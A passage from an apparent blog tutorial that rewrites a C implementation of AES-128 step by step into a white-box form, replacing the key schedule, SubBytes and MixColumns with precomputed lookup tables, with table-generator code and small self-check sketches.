        // Take every byte of `d` & substitute it using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }

    /// Dig in now
    /// The initial round is just AddRoundKey with the first one (being the encryption key)
    memcpy(out, in, 16);
    AddRoundKey(round_keys[0], out);

    /// Let's start the encryption process now
    for (size_t i = 1; i < 10; ++i)
    {
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
        AddRoundKey(round_keys[i], out);
    }

    /// Last round which is a bit different
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Not that bad right? And we can even prepare a function that tests if the encrypted block is valid or not (this is really going to be useful as soon as we start to tweak the implementation):

unsigned char tests()
{
    /// AES128ENC
    {
        unsigned char key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };
        unsigned char out[16] = { 0 };
        unsigned char plain[16] = { 0x32, 0x43, 0xf6, 0xa8, 0x88, 0x5a, 0x30, 0x8d, 0x31, 0x31, 0x98, 0xa2, 0xe0, 0x37, 0x07, 0x34 };
        unsigned char expected[16] = { 0x39, 0x25, 0x84, 0x1d, 0x02, 0xdc, 0x09, 0xfb, 0xdc, 0x11, 0x85, 0x97, 0x19, 0x6a, 0x0b, 0x32 };
        printf("> aes128_enc_base ..");
        aes128_enc_base(plain, out, key);
        if (memcmp(out, expected, 16) != 0)
        {
            printf("FAIL\n");
            return 0;
        }
        printf("OK\n");
    }

    return 1;
}

Brilliant.

White-boxing AES128 in ~7 steps

Introduction

I'm no crypto-expert whatsoever but I'll still try to explain what "white-boxing" AES means for us. Currently, we have a block encryption primitive with the following signature: void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16]). One of the purposes of the white-boxing process is to "remove", or I should say "hide" instead, the key. Your primitive will work without any input key parameter, but the key won't be hard-coded in the body of the function either. You'll be able to encrypt things without any apparent key.

A perfectly secure but impractical version of a white-box AES would be a big hash-table: the keys would be every possible plain-text block and the values would be their encrypted versions under the key you want. That should give you a really clear idea of what a white-box is. But obviously storing that kind of table in memory (2^128 entries of 16 bytes each) is another problem by itself :-).
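
To make that idea a bit more concrete, here is a minimal sketch at toy scale. It assumes a made-up 8-bit cipher (toy_enc is purely hypothetical & not secure at all) so that the whole table fits in 256 bytes; none of these names come from the real implementation.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical 8-bit "cipher", only here to keep the table tiny: NOT secure. */
static unsigned char toy_enc(unsigned char plain, unsigned char key)
{
    unsigned char x = (unsigned char)(plain ^ key);
    x = (unsigned char)((x << 3) | (x >> 5)); /* rotate left by 3 bits */
    return (unsigned char)(x + key);
}

/* Generator side: knows the key, emits one entry per possible plain-text. */
void build_toy_whitebox(unsigned char key, unsigned char table[0x100])
{
    assert(table != NULL);
    for (size_t p = 0; p < 0x100; ++p)
        table[p] = toy_enc((unsigned char)p, key);
}

/* White-box side: a single lookup, no key parameter & no key in the body. */
unsigned char toy_enc_wb(const unsigned char table[0x100], unsigned char plain)
{
    assert(table != NULL);
    return table[plain];
}

/* Returns 1 if the table agrees with the keyed cipher on all 256 inputs. */
int toy_whitebox_selftest(void)
{
    const unsigned char key = 0x42;
    unsigned char table[0x100];

    build_toy_whitebox(key, table);
    for (size_t p = 0; p < 0x100; ++p)
        if (toy_enc_wb(table, (unsigned char)p) != toy_enc((unsigned char)p, key))
            return 0;
    return 1;
}
```

Only build_toy_whitebox ever sees the key ; the function you would ship is toy_enc_wb plus the table. The same construction for a 16-byte block is exactly the table that doesn't fit anywhere.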

Instead of using that "naive" idea, researchers came up with ways to pre-compute "things" that involve the round-keys in order to hide everything. The other goal of a real white-box is to be resistant to reverse-engineering & dynamic/static analysis. Even if you are able to read whatever memory you want, you still should not be able to extract the key. The NoSuchCon2013 crackme is again a really good example of that: we had to wait 2 years before @doegox actually worked his magic to extract the key.

The design of the implementation is really really important in order to make that key extraction process as difficult as possible.

In this part, we are using James A. Muir's paper to rewrite our implementation step by step, in order to make it possible to combine several operations together & make pre-computed tables out of them. At the end of this part we should have a working AES128 encryption primitive that works without any explicit key. But we will also build in parallel a tool used to generate the different tables our implementation is going to need: obviously, this tool is going to need both the key schedule & the encryption key to be able to generate the look-up tables. Long story short: the first steps are basically going to reorder / rewrite the logic of the encryption, & the last ones will really transform the implementation into a white-box.

Anyway, let's go folks!

Step 1: bring the first AddRoundKey in the loop & kick the last one out of it

This one is really easy: basically we just have to change our loop to start at i=0 until i=8 (inclusive), move the first AddRoundKey in the loop, and move the last one outside of it.

The encryption loop should look like this now:

void aes128_enc_reorg_step1(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
    }

    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Step 2: SubBytes then ShiftRows equals ShiftRows then SubBytes

Yet another easy one: because SubBytes is just replacing a byte by its substitution (stored in S_box), you can apply ShiftRows before SubBytes or SubBytes before ShiftRows ; you will get the same result. So let's exchange them:

void aes128_enc_reorg_step2(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        ShiftRows(out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    AddRoundKey(round_keys[9], out);
    ShiftRows(out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}
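
If you want to convince yourself of that, here is a small sketch. Both helpers are stand-ins written for this snippet (assumptions, not the SubBytes/ShiftRows of the post): sub_byte_sketch is an arbitrary byte mapping instead of S_box, and shift_rows_sketch assumes that row r is made of bytes r, r + 4, r + 8 & r + 12.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Stand-in for S_box (an assumption, not the AES table): the argument only
   needs a byte-to-byte mapping, whatever it is. */
static unsigned char sub_byte_sketch(unsigned char x)
{
    return (unsigned char)(x * 7u + 3u);
}

static void sub_bytes_sketch(unsigned char s[16])
{
    for (size_t i = 0; i < 16; ++i)
        s[i] = sub_byte_sketch(s[i]);
}

/* Assumed layout: row r is bytes r, r + 4, r + 8, r + 12 and gets rotated
   r positions to the left. */
static void shift_rows_sketch(unsigned char s[16])
{
    unsigned char t[16];
    for (size_t r = 0; r < 4; ++r)
        for (size_t c = 0; c < 4; ++c)
            t[r + 4 * c] = s[r + 4 * ((c + r) % 4)];
    memcpy(s, t, 16);
}

/* Returns 1 if SubBytes/ShiftRows and ShiftRows/SubBytes agree on `state`. */
int sub_shift_orders_agree(const unsigned char state[16])
{
    unsigned char a[16], b[16];

    assert(state != NULL);
    memcpy(a, state, 16);
    memcpy(b, state, 16);

    sub_bytes_sketch(a);
    shift_rows_sketch(a);

    shift_rows_sketch(b);
    sub_bytes_sketch(b);

    return memcmp(a, b, 16) == 0;
}
```

One operation only changes the value of each byte & the other one only changes its position, which is why the order doesn't matter.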

Step 3: ShiftRows first, but needs to ShiftRows the round-key

This one is a bit more tricky, but again it's more about reordering & rewriting the encryption loop than really replacing computation by look-up tables so far. Basically, the idea of this step is to start the encryption loop with a ShiftRows operation. ShiftRows only moves bytes around, so ShiftRows(state ^ round_key) is the same thing as ShiftRows(state) ^ ShiftRows(round_key): if you put it first you also need to apply ShiftRows to the current round key in order to get the same result as AddRoundKey/ShiftRows.

void aes128_enc_reorg_step3(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);
        ShiftRows(round_keys[i]);
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    ShiftRows(out);
    ShiftRows(round_keys[9]);
    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}
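
The property used in this step can be checked with a few lines. This is only a sketch: shift_rows_sketch is repeated so the snippet stands alone, and it assumes the same layout as before (row r is bytes r, r + 4, r + 8 & r + 12).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Assumed layout: row r is bytes r, r + 4, r + 8, r + 12 and gets rotated
   r positions to the left. */
static void shift_rows_sketch(unsigned char s[16])
{
    unsigned char t[16];
    for (size_t r = 0; r < 4; ++r)
        for (size_t c = 0; c < 4; ++c)
            t[r + 4 * c] = s[r + 4 * ((c + r) % 4)];
    memcpy(s, t, 16);
}

/* Returns 1 if ShiftRows(state ^ key) == ShiftRows(state) ^ ShiftRows(key). */
int shift_rows_distributes_over_xor(const unsigned char state[16],
                                    const unsigned char key[16])
{
    unsigned char lhs[16], rhs[16], k[16];

    assert(state != NULL && key != NULL);

    /* Step 2 order: AddRoundKey, then ShiftRows */
    for (size_t i = 0; i < 16; ++i)
        lhs[i] = (unsigned char)(state[i] ^ key[i]);
    shift_rows_sketch(lhs);

    /* Step 3 order: ShiftRows on the state & on the key, then AddRoundKey */
    memcpy(rhs, state, 16);
    memcpy(k, key, 16);
    shift_rows_sketch(rhs);
    shift_rows_sketch(k);
    for (size_t i = 0; i < 16; ++i)
        rhs[i] ^= k[i];

    return memcmp(lhs, rhs, 16) == 0;
}
```

Note that the loop of step 3 shifts round_keys[i] in place ; that is fine here because every round key is used exactly once.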

Step 4: White-boxing it like it's hot, White-boxing it like it's hot

This step is a really important one for us, it's actually the first one where we are going to be able to both remove the key & start the tables generator project. The tables generator project basically generates everything we need to have our white-box AES encryption working.

Now we don't need the key schedule anymore in the AES encryption function (but obviously we will need it on the table generator side), and we can keep only the encryption loop.

The transformation introduced in this step is to create a look-up table that will replace ShiftRows(round_keys[i])/AddRoundKey/SubBytes. We can clearly see now how our round keys are going to be "diffused" & combined with different operations to make them "not trivially" extractable (in fact they are, but let's say they are not right now). In order to have such a table, we need quite some space though: basically we need this table Tboxes[10][16][0x100]. We have 10 operations ShiftRows(round_keys[i])/AddRoundKey/SubBytes, 16 bytes of round key in each one of them and 0x100 entries for the byte values ([0x00-0xFF]) that can be encrypted.

The computation is not really hard:

  1. We compute the key schedule for a specific encryption key
  2. We populate the table this way:
    1. For each round key (after applying ShiftRows to it):
    2. For each byte index i of that round key:
    3. For every byte possible:
      1. You compute S_box[byte ^ ShiftRows(roundkey)[i]]

The S_box part is for the SubBytes operation, the xor with one byte of the round key is for AddRoundKey & the rest is for ShiftRows(round_keys[i]). There is a special case for round key 9, where you also have to include the AddRoundKey of the last round key (round key 10). It's as if we didn't have 11 AddRoundKey operations anymore, but 10, as the table for round 9 contains information about both round keys 9 & 10.

If you are confused about that bit, don't be ; it's just that I suck at explaining things. Have a look at the following code instead (especially at lines 47 & 48, the if (r == 9) branch):

int main()
{
    unsigned char key[16] = "0vercl0k@doare-e";
    unsigned char plain_block[16] = "whatdup folks???";
    unsigned char round_keys[11][16] = { 0 };

    /// 10 -> we have 10 rounds
    /// 16 -> we have 16 bytes of round keys
    /// 0x100 -> we have to be able to encrypt every plain-text input byte [0-0xff]
    unsigned char Tboxes[10][16][0x100] = { 0 };

    key_schedule(key, round_keys);

    /// Remember we have 10 rounds & we want to combine AddRoundKey & SubBytes
    /// which is really simple.
    /// These so-called T-boxes are defined as follows:
    /// Tri(x) = S[x ^ ShiftRows(rk)[i]] ; r being the round number ([0-8]), x being the byte of plaintext, rk the roundkey & i the index ([0-15])
    printf("#pragma once\n");
    printf("// Table for key='%.16s'\n", key);
    printf("const unsigned char Tboxes[10][16][0x100] = \n{\n");
    for (size_t r = 0; r < 10; ++r)
    {
        printf("  {\n");

        ShiftRows(round_keys[r]);

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                Tboxes[r][i][x] = S_box[x ^ round_keys[r][i]];
                /// We need to include the bytes from the roundkey 10 to replace that:
                ///  ShiftRows(out);
                ///  ShiftRows(round_keys[9]);
                ///  AddRoundKey(round_keys[9], out);
                ///  SubBytes(out);
                ///  AddRoundKey(round_keys[10], out);
                ///
                /// By
                /// ShiftRows(out);
                /// for (size_t j = 0; j < 16; ++j)
                ///     out[j] = Tboxes[9][j][out[j]];
                if (r == 9)
                    Tboxes[r][i][x] ^= round_keys[10][i];

                printf("0x%.2x", Tboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }
            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n\n");
}

Now that we have this table created, we just need to actually use it in our encryption. Thanks to this table, the encryption loop is way more simple and pretty, check it out:

void aes128_enc_wb_step1(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        MixColumns(out);
    }

    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}
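
To see what a single one of those 160 tables contains, here is a sketch that builds just one of them. The helper names are made up for the occasion, and sbox_entry recomputes the AES S-box from its definition (inverse in GF(2^8) followed by the affine map) only to avoid pasting the 256-byte S_box table again.

```c
#include <assert.h>
#include <stddef.h>

/* Multiplication in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1. */
static unsigned char gf_mul(unsigned char a, unsigned char b)
{
    unsigned char r = 0;
    while (b) {
        if (b & 1)
            r ^= a;
        a = (unsigned char)((a << 1) ^ ((a & 0x80) ? 0x1b : 0x00));
        b >>= 1;
    }
    return r;
}

/* AES S-box entry: multiplicative inverse (0 maps to 0), then affine map. */
static unsigned char sbox_entry(unsigned char x)
{
    unsigned char inv = 0, s;
    for (unsigned int y = 1; y < 0x100; ++y)
        if (gf_mul(x, (unsigned char)y) == 1) {
            inv = (unsigned char)y;
            break;
        }
    s = inv;
    for (int k = 1; k <= 4; ++k)
        s ^= (unsigned char)((inv << k) | (inv >> (8 - k)));
    return (unsigned char)(s ^ 0x63);
}

/* One T-box: T[x] = S[x ^ k], k being one byte of ShiftRows(round key).
   For the table of round 9, the matching byte of round key 10 (k10) is
   xored on top, which absorbs the final AddRoundKey. */
void build_tbox_sketch(unsigned char k, int is_round9, unsigned char k10,
                       unsigned char T[0x100])
{
    assert(T != NULL);
    for (size_t x = 0; x < 0x100; ++x) {
        T[x] = sbox_entry((unsigned char)(x ^ k));
        if (is_round9)
            T[x] ^= k10;
    }
}
```

With k = 0x2b (first byte of the key used in tests()) the entry for x = 0x32 (first byte of the plain-text) is 0xd4, which is S_box[0x32 ^ 0x2b] = S_box[0x19].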

Step 5: Transforming MixColumns in a look-up table

OK, so this is maybe the "most difficult" part of the game: we have to transform our ugly MixColumns function into four look-up tables. Basically, we want to transform this:

out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];

by this (where Ty[0-3] are the four look-up tables I mentioned just above):

DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];

We know that gmul[X][a] gives you 1 byte, and we can see that each of those four lines uses gmul[X][a] where X is constant. You can also see that basically those four lines take 4 bytes as input a, b, c & d and will generate 4 bytes as output.

The idea is to combine gmul[matrix[0]][a], gmul[matrix[4]][a], gmul[matrix[8]][a] & gmul[matrix[12]][a] inside a single double-word. We do the same for b, c & d so that we can directly apply the xor operation between double-words now ; the result will also be a double-word so we have our 4 output bytes. We just re-factorized 4 individual computations (1 byte as input, 1 byte as output) into a single one (4 bytes as input, 4 bytes as output).

With that in mind, the tables generation function writes nearly by itself:

int main()
{
[...]
    typedef union
    {
        unsigned char b[4];
        unsigned int i;
    } magic_int;

    /// 4 -> four rows MC
    /// 0x100 -> for every char
    unsigned int Ty[4][0x100] = { 0 };
    printf("const unsigned int Ty[4][0x100] =\n{\n");
    for (size_t i = 0; i < 4; ++i)
    {
        printf("  {\n    ");
        for (size_t j = 0; j < 0x100; ++j)
        {
            if (j != 0 && (j % 16) == 0)
                printf("\n    ");

            magic_int mi;

            mi.b[0] = gmul[matrix[i + 0]][j];
            mi.b[1] = gmul[matrix[i + 4]][j];
            mi.b[2] = gmul[matrix[i + 8]][j];
            mi.b[3] = gmul[matrix[i + 12]][j];

            Ty[i][j] = mi.i;

            printf("0x%.8x", Ty[i][j]);
            if ((j + 1) < 0x100)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 4)
            printf(",");
        printf("\n");
    }
    printf("};\n");
}

Glad to replace that MixColumns call now:

void aes128_enc_wb_step2(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

You can even make it cleaner by merging the two inner-loops & make them both handle 4 bytes of data by 4 bytes of data:

// Unified the loops by treating the state 4 bytes by 4 bytes
void aes128_enc_wb_step3(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}
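
Here is a self-contained sketch of the Ty idea that you can check against a known MixColumns result. Names ending in _sketch are mine, the matrix is assumed to be the usual row-major MixColumns matrix, and gf_mul replaces the gmul table of the post. The words are packed with shifts rather than with a union, so the result doesn't depend on the endianness of the machine.

```c
#include <assert.h>
#include <stddef.h>

/* Multiplication in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1. */
static unsigned char gf_mul(unsigned char a, unsigned char b)
{
    unsigned char r = 0;
    while (b) {
        if (b & 1)
            r ^= a;
        a = (unsigned char)((a << 1) ^ ((a & 0x80) ? 0x1b : 0x00));
        b >>= 1;
    }
    return r;
}

/* MixColumns matrix, row-major (assumed to match `matrix` in the post). */
static const unsigned char mc_matrix_sketch[16] = {
    2, 3, 1, 1,
    1, 2, 3, 1,
    1, 1, 2, 3,
    3, 1, 1, 2
};

/* Ty[i][x]: byte n of the word is matrix[i + 4 * n] * x, in other words
   column i of the matrix multiplied by x. */
void build_ty_sketch(unsigned int Ty[4][0x100])
{
    assert(Ty != NULL);
    for (size_t i = 0; i < 4; ++i)
        for (size_t x = 0; x < 0x100; ++x) {
            unsigned int w = 0;
            for (size_t n = 0; n < 4; ++n)
                w |= (unsigned int)gf_mul(mc_matrix_sketch[i + 4 * n],
                                          (unsigned char)x) << (8 * n);
            Ty[i][x] = w;
        }
}

/* MixColumns on one column (a, b, c, d): four lookups & three xors.
   Output byte n sits in bits [8 * n, 8 * n + 7] of the result. */
unsigned int mix_column_ty_sketch(unsigned int Ty[4][0x100], unsigned char a,
                                  unsigned char b, unsigned char c,
                                  unsigned char d)
{
    return Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
}
```

For the column db 13 53 45 this gives 0xbca14d8e, i.e. the bytes 8e 4d a1 bc once unpacked from the low byte up.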

Step 6: Adding a little xor table

This step is a really simple one (& kind of useless) ; we just want to replace the xor operation between 2 double-words by a look-up table that does it between 2 nibbles (4 bits). Basically, you xor the 8 nibbles of each double-word one at a time with the table, and you recombine the results into a full double-word with or operations & some binary shifts. Easy peasy:

int main()
{
[...]
    /// Xor Tables
    /// Basically takes two nibbles in input & generate a nibble in output (x^y)
    unsigned char Xor[0x10][0x10] = { 0 };
    printf("const unsigned char Txor[0x10][0x10] =\n{\n");
    for (size_t i = 0; i < 0x10; ++i)
    {
        printf("  {\n    ");

        for (size_t j = 0; j < 0x10; ++j)
        {
            if (j != 0 && (j % 8) == 0)
                printf("\n    ");

            Xor[i][j] = i ^ j;
            printf("0x%.1x", Xor[i][j]);
            if ((j + 1) < 0x10)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 0x10)
            printf(",");
        printf("\n");
    }
    printf("};\n");
    return EXIT_SUCCESS;
}

Which is directly used by our implementation:

void aes128_enc_wb_step4(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            unsigned int aa = Ty[0][a];
            unsigned int bb = Ty[1][b];
            unsigned int cc = Ty[2][c];
            unsigned int dd = Ty[3][d];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]])  | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]])  | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]])  | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]])  | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}
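
The four long lines above are easier to read as a loop over the nibbles. A minimal sketch, with function names of my own & assuming a 32-bit unsigned int like the rest of the post:

```c
#include <assert.h>
#include <stddef.h>

/* Txor[i][j] = i ^ j for two nibbles. */
void build_txor_sketch(unsigned char Txor[0x10][0x10])
{
    assert(Txor != NULL);
    for (size_t i = 0; i < 0x10; ++i)
        for (size_t j = 0; j < 0x10; ++j)
            Txor[i][j] = (unsigned char)(i ^ j);
}

/* aa ^ bb ^ cc ^ dd computed nibble by nibble with table lookups only. */
unsigned int xor4_with_table_sketch(unsigned char Txor[0x10][0x10],
                                    unsigned int aa, unsigned int bb,
                                    unsigned int cc, unsigned int dd)
{
    unsigned int out = 0;

    assert(Txor != NULL);
    for (unsigned int shift = 0; shift < 32; shift += 4) {
        unsigned char ab = Txor[(aa >> shift) & 0xf][(bb >> shift) & 0xf];
        unsigned char cd = Txor[(cc >> shift) & 0xf][(dd >> shift) & 0xf];
        out |= (unsigned int)Txor[ab][cd] << shift;
    }
    return out;
}
```

Three lookups per nibble & eight nibbles per double-word: that is 24 lookups to replace three xor instructions, which is why this step only makes sense as preparation for obfuscation.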

Step 7: Combining TBoxes & Ty tables

The last step aims to combine the Tboxes with Ty tables and if you look at the code it doesn't seem really hard. We basically want the table to work this way: 1 byte as input (a for example in the previous code) & generate 4 bytes of outputs.

To compute such a table, you need to compute the Tboxes (or not, you can compute everything without relying on the Tboxes ; it's actually what I'm doing), & then you compute Ty[j % 4][Tboxes[i][j][X]] ; this is it, roughly. X, i and j are the variables here (the byte value, the round & the byte index), which means we will end up with a table like that:

const unsigned int Tyboxes[9][16][0x100];

Makes sense right?

So here is the code that generates that big table:

int main()
{
[...]
    /// Tyboxes
    /// It's basically Tybox(Tboxes(x))
    unsigned int Tyboxes[9][16][0x100] = { 0 };
    printf("const unsigned int Tyboxes[9][16][0x100] =\n{\n");
    for (size_t r = 0; r < 9; ++r)
    {
        printf("  {\n");

        // ShiftRows(round_keys[r]); <- don't forget we already executed that to compute the Tboxes

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                unsigned char c = S_box[x ^ round_keys[r][i]];
                Tyboxes[r][i][x] = Ty[i % 4][c];

                printf("0x%.8x", Tyboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }

            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 9)
            printf(",");
        printf("\n");
    }
    printf("};\n");

    printf("const unsigned char Tboxes_[16][0x100] = \n{\n");
    for (size_t i = 0; i < 16; ++i)
    {
        printf("  {\n    ");
        for (size_t x = 0; x < 0x100; ++x)
        {
            if (x != 0 && (x % 16) == 0)
                printf("\n    ");

            Tboxes[9][i][x] = S_box[x ^ round_keys[9][i]] ^ round_keys[10][i];
            printf("0x%.2x", Tboxes[9][i][x]);
            if ((x + 1) < 0x100)
                printf(", ");
        }
        printf("\n  }");
        if ((i + 1) < 16)
            printf(",");

        printf("\n");
    }

    printf("};\n\n");
    return EXIT_SUCCESS;
}

We just have to take care of the last round which is a bit different as we saw earlier, but no biggie.
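
As a sanity check of the merged tables, the sketch below pushes one column of the first round through four Tyboxes-like lookups. Everything here is an assumption made for the snippet: entries are computed on the fly instead of being read from the generated table, sbox_entry rebuilds the S-box from its definition, and the output word is packed with shifts (low byte first).

```c
#include <assert.h>
#include <stddef.h>

/* Multiplication in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1. */
static unsigned char gf_mul(unsigned char a, unsigned char b)
{
    unsigned char r = 0;
    while (b) {
        if (b & 1)
            r ^= a;
        a = (unsigned char)((a << 1) ^ ((a & 0x80) ? 0x1b : 0x00));
        b >>= 1;
    }
    return r;
}

/* AES S-box entry: multiplicative inverse (0 maps to 0), then affine map. */
static unsigned char sbox_entry(unsigned char x)
{
    unsigned char inv = 0, s;
    for (unsigned int y = 1; y < 0x100; ++y)
        if (gf_mul(x, (unsigned char)y) == 1) {
            inv = (unsigned char)y;
            break;
        }
    s = inv;
    for (int k = 1; k <= 4; ++k)
        s ^= (unsigned char)((inv << k) | (inv >> (8 - k)));
    return (unsigned char)(s ^ 0x63);
}

/* Same value as Ty[i % 4][S_box[x ^ k]], k being byte i of ShiftRows(round key). */
static unsigned int tybox_entry_sketch(unsigned char k, size_t i, unsigned char x)
{
    static const unsigned char m[16] = { 2, 3, 1, 1, 1, 2, 3, 1, 1, 1, 2, 3, 3, 1, 1, 2 };
    unsigned char c = sbox_entry((unsigned char)(x ^ k));
    unsigned int w = 0;
    for (size_t n = 0; n < 4; ++n)
        w |= (unsigned int)gf_mul(m[(i % 4) + 4 * n], c) << (8 * n);
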